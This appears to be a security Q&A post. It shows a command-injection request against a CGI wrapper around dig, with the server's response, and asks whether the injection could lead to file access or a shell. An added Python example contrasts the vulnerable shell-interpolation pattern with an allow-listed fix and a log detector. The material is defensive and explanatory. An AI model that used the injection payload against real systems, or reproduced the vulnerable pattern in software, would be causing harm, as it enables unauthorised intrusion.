While testing a web application today, I came across a function that passed arguments to dig in a Linux terminal. After some fiddling about I was able to pass the echo command using pipes and echo my input to the response; however, I failed to launch any other commands.
Now my question is: is it possible to use the echo command in a malicious way to access sensitive files on the system or gain a shell?
Here is the vulnerable GET request:
GET /cgi-mod/test.cgi?dig_device=8.8.8.8"|echo%20abc123%20|| HTTP/1.1
Host: test.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
And here is the response:
HTTP/1.1 200 OK
Server: TestServer
Date: Mon, 02 May 2016 11:03:40 GMT
Content-Type: text/html
Connection: close
Status: 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 1576
<html><head><meta charset="utf-8" /><title></title></head><body><pre><!--
; <<>> DiG 9.4.1-P1 <<>> abc123
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32623
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;abc123. IN A
;; ANSWER SECTION:
abc123. 10 IN A 104.239.213.7
abc123. 10 IN A 198.105.254.11
;; Query time: 69 msec
;; SERVER: 4.2.2.1#53(4.2.2.1)
;; WHEN: Mon May 2 04:03:41 2016
;; MSG SIZE rcvd: 56
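The following is an added example, not part of the original post and not the code behind test.cgi, which I have not seen. It shows the construction pattern that makes a wrapper around dig injectable (interpolating the request parameter into a shell command line) beside a hardened form that allow-lists the value as an IP literal or hostname and passes it to dig as a single argv element with no shell. It also runs the same allow-list over a few constructed access-log lines, using the dig_device value from the request above, so a defender can flag requests that carry shell metacharacters in that parameter. The parameter name dig_device and the CGI path come from the question; the log format and the +short flag are my assumptions.

```python
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading/trailing hyphen, at most 253 characters overall.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def build_dig_command_unsafe(dig_device: str) -> str:
    """Vulnerable pattern (illustrative): the parameter is pasted into a shell
    string. A value containing a closing quote and a pipe turns the single
    dig call into a pipeline, which is exactly what the echo test exercised."""
    return 'dig "%s"' % dig_device


def is_valid_target(dig_device: str) -> bool:
    """Allow-list check: accept only an IP literal or a syntactic hostname.
    Quotes, pipes, semicolons, spaces and $() cannot pass this grammar."""
    try:
        ipaddress.ip_address(dig_device)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(dig_device) is not None


def build_dig_command_safe(dig_device: str) -> list:
    """Hardened form: the validated value becomes one argv element. With no
    shell involved there is nothing that interprets metacharacters, and the
    allow-list rejects them before dig is ever reached."""
    if not is_valid_target(dig_device):
        raise ValueError("dig_device is not an IP address or hostname: %r" % dig_device)
    return ["dig", "+short", dig_device]  # +short is an assumption, not from test.cgi


def run_dig(dig_device: str) -> str:
    """Execute the hardened command (shell=False is the default for a list argv)."""
    argv = build_dig_command_safe(dig_device)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10, check=False).stdout


# Constructed access-log lines in common log format (not real traffic). The
# second line carries the dig_device value from the question, percent-encoded
# as a logging web server would typically record it.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/May/2016:11:03:40 +0000] "GET /cgi-mod/test.cgi?dig_device=8.8.8.8 HTTP/1.1" 200 1500',
    '10.0.0.6 - - [02/May/2016:11:03:41 +0000] "GET /cgi-mod/test.cgi?dig_device=8.8.8.8%22%7Cecho%20abc123%20%7C%7C HTTP/1.1" 200 1576',
    '10.0.0.7 - - [02/May/2016:11:03:42 +0000] "GET /index.html HTTP/1.1" 200 300',
]

_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_dig_requests(log_lines):
    """Detection: return (line, decoded value) for every request whose
    dig_device parameter fails the same allow-list the CGI should enforce."""
    hits = []
    for line in log_lines:
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        for value in query.get("dig_device", []):
            if not is_valid_target(value):
                hits.append((line, value))
    return hits


if __name__ == "__main__":
    for line, value in suspicious_dig_requests(SAMPLE_LOG):
        print("suspicious dig_device value %r in: %s" % (value, line))
    print(build_dig_command_safe("8.8.8.8"))
```

The detection half is deliberately the same allow-list as the fix: if a value would have been rejected by the hardened CGI, it is worth a look in historical logs. Note that a bare label such as abc123 is a syntactically valid hostname, so the response in the question (dig resolving abc123) is consistent with the grammar and is not flagged by this check; the flag fires on the quote and pipe characters.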